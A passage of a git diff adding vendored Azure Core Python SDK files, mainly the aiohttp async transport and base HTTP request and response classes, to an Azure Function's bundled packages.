AioHttpTransport + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'AioHttpTransportResponse': + try: + from ._aiohttp import AioHttpTransportResponse + return AioHttpTransportResponse + except ImportError: + raise ImportError("aiohttp package is not installed") + return name + + else: + try: + from ._aiohttp import AioHttpTransport, AioHttpTransportResponse + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + except ImportError: + pass # Aiohttp not installed + except (ImportError, SyntaxError): + pass # Asynchronous pipelines not supported. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3774e3d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc new file mode 100644 index 0000000..cf62831 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..3e5e147 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..736e5fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc new file mode 100644 index 0000000..2890b7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc new file mode 100644 index 0000000..738e928 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc new file mode 100644 index 0000000..5a5724f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc new file mode 100644 index 0000000..6dfd895 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc new file mode 100644 index 0000000..8940671 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py new file mode 100644 index 0000000..0a41eec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py @@ -0,0 +1,420 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import sys +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +from collections.abc import AsyncIterator + +import logging +import asyncio +import codecs +import aiohttp +from multidict import CIMultiDict + +from azure.core.configuration import ConnectionConfiguration +from azure.core.exceptions import ServiceRequestError, ServiceResponseError, IncompleteReadError +from azure.core.pipeline import Pipeline + +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpTransport, + AsyncHttpResponse, + _ResponseStopIteration) +from ...utils._pipeline_transport_rest_shared import _aiohttp_body_helper +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse, + ) + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 +_LOGGER = logging.getLogger(__name__) + +class AioHttpTransport(AsyncHttpTransport): + """AioHttp HTTP sender implementation. + + Fully asynchronous implementation using the aiohttp library. + + :param session: The client session. + :param bool session_owner: Session owner. Defaults True. + + :keyword bool use_env_settings: Uses proxy settings from environment. Defaults to True. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START aiohttp] + :end-before: [END aiohttp] + :language: python + :dedent: 4 + :caption: Asynchronous transport with aiohttp. + """ + def __init__(self, *, session: Optional[aiohttp.ClientSession] = None, loop=None, session_owner=True, **kwargs): + if loop and sys.version_info >= (3, 10): + raise ValueError("Starting with Python 3.10, asyncio doesn’t support loop as a parameter anymore") + self._loop = loop + self._session_owner = session_owner + self.session = session + self.connection_config = ConnectionConfiguration(**kwargs) + self._use_env_settings = kwargs.pop('use_env_settings', True) + + async def __aenter__(self): + await self.open() + return self + + async def __aexit__(self, *args): # pylint: disable=arguments-differ + await self.close() + + async def open(self): + """Opens the connection. + """ + if not self.session and self._session_owner: + jar = aiohttp.DummyCookieJar() + clientsession_kwargs = { + "trust_env": self._use_env_settings, + "cookie_jar": jar, + "auto_decompress": False, + } + if self._loop is not None: + clientsession_kwargs["loop"] = self._loop + self.session = aiohttp.ClientSession(**clientsession_kwargs) + if self.session is not None: + await self.session.__aenter__() + + async def close(self): + """Closes the connection. + """ + if self._session_owner and self.session: + await self.session.close() + self._session_owner = False + self.session = None + + def _build_ssl_config(self, cert, verify): # pylint: disable=no-self-use + ssl_ctx = None + + if cert or verify not in (True, False): + import ssl + if verify not in (True, False): + ssl_ctx = ssl.create_default_context(cafile=verify) + else: + ssl_ctx = ssl.create_default_context() + if cert: + ssl_ctx.load_cert_chain(*cert) + return ssl_ctx + return verify + + def _get_request_data(self, request): #pylint: disable=no-self-use + if request.files: + form_data = aiohttp.FormData() + for form_file, data in request.files.items(): + content_type = data[2] if len(data) > 2 else None + try: + form_data.add_field(form_file, data[1], filename=data[0], content_type=content_type) + except IndexError: + raise ValueError("Invalid formdata formatting: {}".format(data)) + return form_data + return request.data + + @overload + async def send(self, request: HttpRequest, **config: Any) -> Optional[AsyncHttpResponse]: + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + + @overload + async def send(self, request: "RestHttpRequest", **config: Any) -> Optional["RestAsyncHttpResponse"]: + """Send the `azure.core.rest` request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.rest.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + + async def send(self, request, **config): + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + await self.open() + try: + auto_decompress = self.session.auto_decompress # type: ignore + except AttributeError: + # auto_decompress is introduced in aiohttp 3.7. We need this to handle Python 3.6. + auto_decompress = False + + proxies = config.pop('proxies', None) + if proxies and 'proxy' not in config: + # aiohttp needs a single proxy, so iterating until we found the right protocol + + # Sort by longest string first, so "http" is not used for "https" ;-) + for protocol in sorted(proxies.keys(), reverse=True): + if request.url.startswith(protocol): + config['proxy'] = proxies[protocol] + break + + response: Optional["HTTPResponseType"] = None + config['ssl'] = self._build_ssl_config( + cert=config.pop('connection_cert', self.connection_config.cert), + verify=config.pop('connection_verify', self.connection_config.verify) + ) + # If we know for sure there is not body, disable "auto content type" + # Otherwise, aiohttp will send "application/octect-stream" even for empty POST request + # and that break services like storage signature + if not request.data and not request.files: + config['skip_auto_headers'] = ['Content-Type'] + try: + stream_response = config.pop("stream", False) + timeout = config.pop('connection_timeout', self.connection_config.timeout) + read_timeout = config.pop('read_timeout', self.connection_config.read_timeout) + socket_timeout = aiohttp.ClientTimeout(sock_connect=timeout, sock_read=read_timeout) + result = await self.session.request( # type: ignore + request.method, + request.url, + headers=request.headers, + data=self._get_request_data(request), + timeout=socket_timeout, + allow_redirects=False, + **config + ) + if _is_rest(request): + from azure.core.rest._aiohttp import RestAioHttpTransportResponse + response = RestAioHttpTransportResponse( + request=request, + internal_response=result, + block_size=self.connection_config.data_block_size, + decompress=not auto_decompress + ) + if not stream_response: + await _handle_no_stream_rest_response(response) + else: + response = AioHttpTransportResponse(request, result, + self.connection_config.data_block_size, + decompress=not auto_decompress) + if not stream_response: + await response.load_body() + except aiohttp.client_exceptions.ClientResponseError as err: + raise ServiceResponseError(err, error=err) from err + except aiohttp.client_exceptions.ClientError as err: + raise ServiceRequestError(err, error=err) from err + except asyncio.TimeoutError as err: + raise ServiceResponseError(err, error=err) from err + return response + +class AioHttpStreamDownloadGenerator(AsyncIterator): + """Streams the response body data. + + :param pipeline: The pipeline object + :param response: The client response object. + :param bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, *, decompress=True) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + self._decompress = decompress + internal_response = response.internal_response + self.content_length = int(internal_response.headers.get('Content-Length', 0)) + self._decompressor = None + + def __len__(self): + return self.content_length + + async def __anext__(self): + internal_response = self.response.internal_response + try: + chunk = await internal_response.content.read(self.block_size) + if not chunk: + raise _ResponseStopIteration() + if not self._decompress: + return chunk + enc = internal_response.headers.get('Content-Encoding') + if not enc: + return chunk + enc = enc.lower() + if enc in ("gzip", "deflate"): + if not self._decompressor: + import zlib + zlib_mode = 16 + zlib.MAX_WBITS if enc == "gzip" else zlib.MAX_WBITS + self._decompressor = zlib.decompressobj(wbits=zlib_mode) + chunk = self._decompressor.decompress(chunk) + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except aiohttp.client_exceptions.ClientPayloadError as err: + # This is the case that server closes connection before we finish the reading. aiohttp library + # raises ClientPayloadError. + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + +class AioHttpTransportResponse(AsyncHttpResponse): + """Methods for accessing response body data. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param aiohttp_response: Returned from ClientSession.request(). + :type aiohttp_response: aiohttp.ClientResponse object + :param block_size: block size of data sent over connection. + :type block_size: int + :param bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, request: HttpRequest, + aiohttp_response: aiohttp.ClientResponse, + block_size=None, *, decompress=True) -> None: + super(AioHttpTransportResponse, self).__init__(request, aiohttp_response, block_size=block_size) + # https://aiohttp.readthedocs.io/en/stable/client_reference.html#aiohttp.ClientResponse + self.status_code = aiohttp_response.status + self.headers = CIMultiDict(aiohttp_response.headers) + self.reason = aiohttp_response.reason + self.content_type = aiohttp_response.headers.get('content-type') + self._content = None + self._decompressed_content = False + self._decompress = decompress + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + """ + return _aiohttp_body_helper(self) + + def text(self, encoding: Optional[str] = None) -> str: + """Return the whole body as a string. + + If encoding is not provided, rely on aiohttp auto-detection. + + :param str encoding: The encoding to apply. + """ + # super().text detects charset based on self._content() which is compressed + # implement the decoding explicitly here + body = self.body() + + ctype = self.headers.get(aiohttp.hdrs.CONTENT_TYPE, "").lower() + mimetype = aiohttp.helpers.parse_mimetype(ctype) + + if not encoding: + # extract encoding from mimetype, if caller does not specify + encoding = mimetype.parameters.get("charset") + if encoding: + try: + codecs.lookup(encoding) + except LookupError: + encoding = None + if not encoding: + if mimetype.type == "application" and ( + mimetype.subtype == "json" or mimetype.subtype == "rdap" + ): + # RFC 7159 states that the default encoding is UTF-8. + # RFC 7483 defines application/rdap+json + encoding = "utf-8" + elif body is None: + raise RuntimeError( + "Cannot guess the encoding of a not yet read body" + ) + else: + try: + import cchardet as chardet + except ImportError: # pragma: no cover + try: + import chardet # type: ignore + except ImportError: # pragma: no cover + import charset_normalizer as chardet # type: ignore[no-redef] + encoding = chardet.detect(body)["encoding"] + if encoding == "utf-8" or encoding is None: + encoding = "utf-8-sig" + + return body.decode(encoding) + + async def load_body(self) -> None: + """Load in memory the body, so it could be accessible from sync methods.""" + try: + self._content = await self.internal_response.read() + except aiohttp.client_exceptions.ClientPayloadError as err: + # This is the case that server closes connection before we finish the reading. aiohttp library + # raises ClientPayloadError. + raise IncompleteReadError(err, error=err) + + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: + """Generator for streaming response body data. + + :param pipeline: The pipeline object + :type pipeline: azure.core.pipeline.Pipeline + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + return AioHttpStreamDownloadGenerator(pipeline, self, **kwargs) + + def __getstate__(self): + # Be sure body is loaded in memory, otherwise not pickable and let it throw + self.body() + + state = self.__dict__.copy() + # Remove the unpicklable entries. + state['internal_response'] = None # aiohttp response are not pickable (see headers comments) + state['headers'] = CIMultiDict(self.headers) # MultiDictProxy is not pickable + return state diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py new file mode 100644 index 0000000..a86cf47 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py @@ -0,0 +1,768 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import +import abc +from email.message import Message +import json +import logging +import time +import copy + +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import ( + TYPE_CHECKING, + Generic, + TypeVar, + IO, + List, + Union, + Any, + Mapping, + Dict, + Optional, + Tuple, + Iterator, + Type +) + +from six.moves.http_client import HTTPResponse as _HTTPResponse + +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import ( + ABC, + AbstractContextManager, +) +from ...utils._utils import case_insensitive_dict +from ...utils._pipeline_transport_rest_shared import ( + _format_parameters_helper, + _prepare_multipart_body_helper, + _serialize_request, + _format_data_helper, + BytesIOSocket, + _decode_parts_helper, + _get_raw_parts_helper, + _parts_helper, +) + + +if TYPE_CHECKING: + from collections.abc import MutableMapping + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +PipelineType = TypeVar("PipelineType") + +_LOGGER = logging.getLogger(__name__) + + +def _format_url_section(template, **kwargs): + """String format the template with the kwargs, auto-skip sections of the template that are NOT in the kwargs. + + By default in Python, "format" will raise a KeyError if a template element is not found. Here the section between + the slashes will be removed from the template instead. + + This is used for API like Storage, where when Swagger has template section not defined as parameter. + + :param str template: a string template to fill + :param dict[str,str] kwargs: Template values as string + :rtype: str + :returns: Template completed + """ + components = template.split("/") + while components: + try: + return template.format(**kwargs) + except KeyError as key: + formatted_components = template.split("/") + components = [ + c for c in formatted_components if "{{{}}}".format(key.args[0]) not in c + ] + template = "/".join(components) + # No URL sections left - returning None + + +def _urljoin(base_url, stub_url): + # type: (str, str) -> str + """Append to end of base URL without losing query parameters. + + :param str base_url: The base URL. + :param str stub_url: Section to append to the end of the URL path. + :returns: The updated URL. + :rtype: str + """ + parsed = urlparse(base_url) + parsed = parsed._replace(path=parsed.path.rstrip("/") + "/" + stub_url) + return parsed.geturl() + +class HttpTransport( + AbstractContextManager, ABC, Generic[HTTPRequestType, HTTPResponseType] +): # type: ignore + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> HTTPResponseType + """Send the request using this HTTP sender. + + :param request: The pipeline request object + :type request: ~azure.core.transport.HTTPRequest + :return: The pipeline response object. + :rtype: ~azure.core.pipeline.transport.HttpResponse + """ + + @abc.abstractmethod + def open(self): + """Assign new session if one does not already exist.""" + + @abc.abstractmethod + def close(self): + """Close the session if it is not externally owned.""" + + def sleep(self, duration): # pylint: disable=no-self-use + time.sleep(duration) + + +class HttpRequest(object): + """Represents a HTTP request. + + URL can be given without query parameters, to be added later using "format_parameters". + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + + def __init__(self, method, url, headers=None, files=None, data=None): + # type: (str, str, Mapping[str, str], Any, Any) -> None + self.method = method + self.url = url + self.headers = case_insensitive_dict(headers) + self.files = files + self.data = data + self.multipart_mixed_info = None # type: Optional[Tuple] + + def __repr__(self): + return "".format( + self.method, self.url + ) + + def __deepcopy__(self, memo=None): + try: + data = copy.deepcopy(self.body, memo) + files = copy.deepcopy(self.files, memo) + request = HttpRequest(self.method, self.url, self.headers, files, data) + request.multipart_mixed_info = self.multipart_mixed_info + return request + except (ValueError, TypeError): + return copy.copy(self) + + @property + def query(self): + """The query parameters of the request as a dict. + + :rtype: dict[str, str] + """ + query = urlparse(self.url).query + if query: + return {p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")]} + return {} + + @property + def body(self): + """Alias to data. + + :rtype: bytes + """ + return self.data + + @body.setter + def body(self, value): + self.data = value + + @staticmethod + def _format_data(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. + """ + return _format_data_helper(data) + + def format_parameters(self, params): + # type: (Dict[str, str]) -> None + """Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param dict params: A dictionary of parameters. + """ + return _format_parameters_helper(self, params) + + def set_streamed_data_body(self, data): + """Set a streamable data body. + + :param data: The request field data. + :type data: stream or generator or asyncgenerator + """ + if not isinstance(data, binary_type) and not any( + hasattr(data, attr) for attr in ["read", "__iter__", "__aiter__"] + ): + raise TypeError( + "A streamable data source must be an open file-like object or iterable." + ) + self.data = data + self.files = None + + def set_text_body(self, data): + """Set a text as body of the request. + + :param data: A text to send as body. + :type data: str + """ + if data is None: + self.data = None + else: + self.data = data + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_xml_body(self, data): + """Set an XML element tree as the body of the request. + + :param data: The request field data. + :type data: XML node + """ + if data is None: + self.data = None + else: + bytes_data = ET.tostring(data, encoding="utf8") + self.data = bytes_data.replace(b"encoding='utf8'", b"encoding='utf-8'") + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_json_body(self, data): + """Set a JSON-friendly object as the body of the request. + + :param data: A JSON serializable object + """ + if data is None: + self.data = None + else: + self.data = json.dumps(data) + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_formdata_body(self, data=None): + """Set form-encoded data as the body of the request. + + :param data: The request field data. + :type data: dict + """ + if data is None: + data = {} + content_type = self.headers.pop("Content-Type", None) if self.headers else None + + if content_type and content_type.lower() == "application/x-www-form-urlencoded": + self.data = {f: d for f, d in data.items() if d is not None} + self.files = None + else: # Assume "multipart/form-data" + self.files = { + f: self._format_data(d) for f, d in data.items() if d is not None + } + self.data = None + + def set_bytes_body(self, data): + """Set generic bytes as the body of the request. + + Will set content-length. + + :param data: The request field data. + :type data: bytes + """ + if data: + self.headers["Content-Length"] = str(len(data)) + self.data = data + self.files = None + + def set_multipart_mixed(self, *requests, **kwargs): + # type: (HttpRequest, Any) -> None + """Set the part of a multipart/mixed. + + Only supported args for now are HttpRequest objects. + + boundary is optional, and one will be generated if you don't provide one. + Note that no verification are made on the boundary, this is considered advanced + enough so you know how to respect RFC1341 7.2.1 and provide a correct boundary. + + Any additional kwargs will be passed into the pipeline context for per-request policy + configuration. + + :keyword list[SansIOHTTPPolicy] policies: SansIOPolicy to apply at preparation time + :keyword str boundary: Optional boundary + :param requests: HttpRequests object + """ + self.multipart_mixed_info = ( + requests, + kwargs.pop("policies", []), + kwargs.pop("boundary", None), + kwargs + ) + + def prepare_multipart_body(self, content_index=0): + # type: (int) -> int + """Will prepare the body of this request according to the multipart information. + + This call assumes the on_request policies have been applied already in their + correct context (sync/async) + + Does nothing if "set_multipart_mixed" was never called. + + :param int content_index: The current index of parts within the batch message. + :returns: The updated index after all parts in this request have been added. + :rtype: int + """ + return _prepare_multipart_body_helper(self, content_index) + + def serialize(self): + # type: () -> bytes + """Serialize this request using application/http spec. + + :rtype: bytes + """ + return _serialize_request(self) + +class _HttpResponseBase(object): + """Represent a HTTP response. + + No body is defined here on purpose, since async pipeline + will provide async ways to access the body + Full in-memory using "body" as bytes. + + :param request: The request. + :type request: ~azure.core.pipeline.transport.HttpRequest + :param internal_response: The object returned from the HTTP library. + :param int block_size: Defaults to 4096 bytes. + """ + + def __init__(self, request, internal_response, block_size=None): + # type: (HttpRequest, Any, Optional[int]) -> None + self.request = request + self.internal_response = internal_response + self.status_code = None # type: Optional[int] + self.headers = {} # type: MutableMapping[str, str] + self.reason = None # type: Optional[str] + self.content_type = None # type: Optional[str] + self.block_size = block_size or 4096 # Default to same as Requests + + def body(self): + # type: () -> bytes + """Return the whole body as bytes in memory. + """ + raise NotImplementedError() + + def text(self, encoding=None): + # type: (str) -> str + """Return the whole body as a string. + + :param str encoding: The encoding to apply. If None, use "utf-8" with BOM parsing (utf-8-sig). + Implementation can be smarter if they want (using headers or chardet). + """ + if encoding == "utf-8" or encoding is None: + encoding = "utf-8-sig" + return self.body().decode(encoding) + + def _decode_parts(self, message, http_response_type, requests): + # type: (Message, Type[_HttpResponseBase], List[HttpRequest]) -> List[HttpResponse] + """Rebuild an HTTP response from pure string.""" + return _decode_parts_helper(self, message, http_response_type, requests, _deserialize_response) + + def _get_raw_parts(self, http_response_type=None): + # type (Optional[Type[_HttpResponseBase]]) -> Iterator[HttpResponse] + """Assuming this body is multipart, return the iterator or parts. + + If parts are application/http use http_response_type or HttpClientTransportResponse + as enveloppe. + """ + return _get_raw_parts_helper(self, http_response_type or HttpClientTransportResponse) + + def raise_for_status(self): + # type () -> None + """Raises an HttpResponseError if the response has an error status code. + If response is good, does nothing. + """ + if self.status_code >= 400: + raise HttpResponseError(response=self) + + def __repr__(self): + # there doesn't have to be a content type + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "<{}: {} {}{}>".format( + type(self).__name__, self.status_code, self.reason, content_type_str + ) + + +class HttpResponse(_HttpResponseBase): # pylint: disable=abstract-method + def stream_download(self, pipeline, **kwargs): + # type: (PipelineType, **Any) -> Iterator[bytes] + """Generator for streaming request body data. + + Should be implemented by sub-classes if streaming download + is supported. + + :rtype: iterator[bytes] + """ + + def parts(self): + # type: () -> Iterator[HttpResponse] + """Assuming the content-type is multipart/mixed, will return the parts as an iterator. + + :rtype: iterator[HttpResponse] + :raises ValueError: If the content is not multipart/mixed + """ + return _parts_helper(self) + + +class _HttpClientTransportResponse(_HttpResponseBase): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + + :param HttpRequest request: The request. + :param httpclient_response: The object returned from an HTTP(S)Connection from http.client + """ + + def __init__(self, request, httpclient_response): + super(_HttpClientTransportResponse, self).__init__(request, httpclient_response) + self.status_code = httpclient_response.status + self.headers = case_insensitive_dict(httpclient_response.getheaders()) + self.reason = httpclient_response.reason + self.content_type = self.headers.get("Content-Type") + self.data = None + + def body(self): + if self.data is None: + self.data = self.internal_response.read() + return self.data + + +class HttpClientTransportResponse(_HttpClientTransportResponse, HttpResponse): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + """ + + +def _deserialize_response( + http_response_as_bytes, http_request, http_response_type=HttpClientTransportResponse +): + local_socket = BytesIOSocket(http_response_as_bytes) + response = _HTTPResponse(local_socket, method=http_request.method) + response.begin() + return http_response_type(http_request, response) + + +class PipelineClientBase(object): + """Base class for pipeline clients. + + :param str base_url: URL for the request. + """ + + def __init__(self, base_url): + self._base_url = base_url + + def _request( + self, + method, # type: str + url, # type: str + params, # type: Optional[Dict[str, str]] + headers, # type: Optional[Dict[str, str]] + content, # type: Any + form_content, # type: Optional[Dict[str, Any]] + stream_content, # type: Any + ): + # type: (...) -> HttpRequest + """Create HttpRequest object. + + If content is not None, guesses will be used to set the right body: + - If content is an XML tree, will serialize as XML + - If content-type starts by "text/", set the content as text + - Else, try JSON serialization + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: URL for the request. + :param dict params: URL query parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An 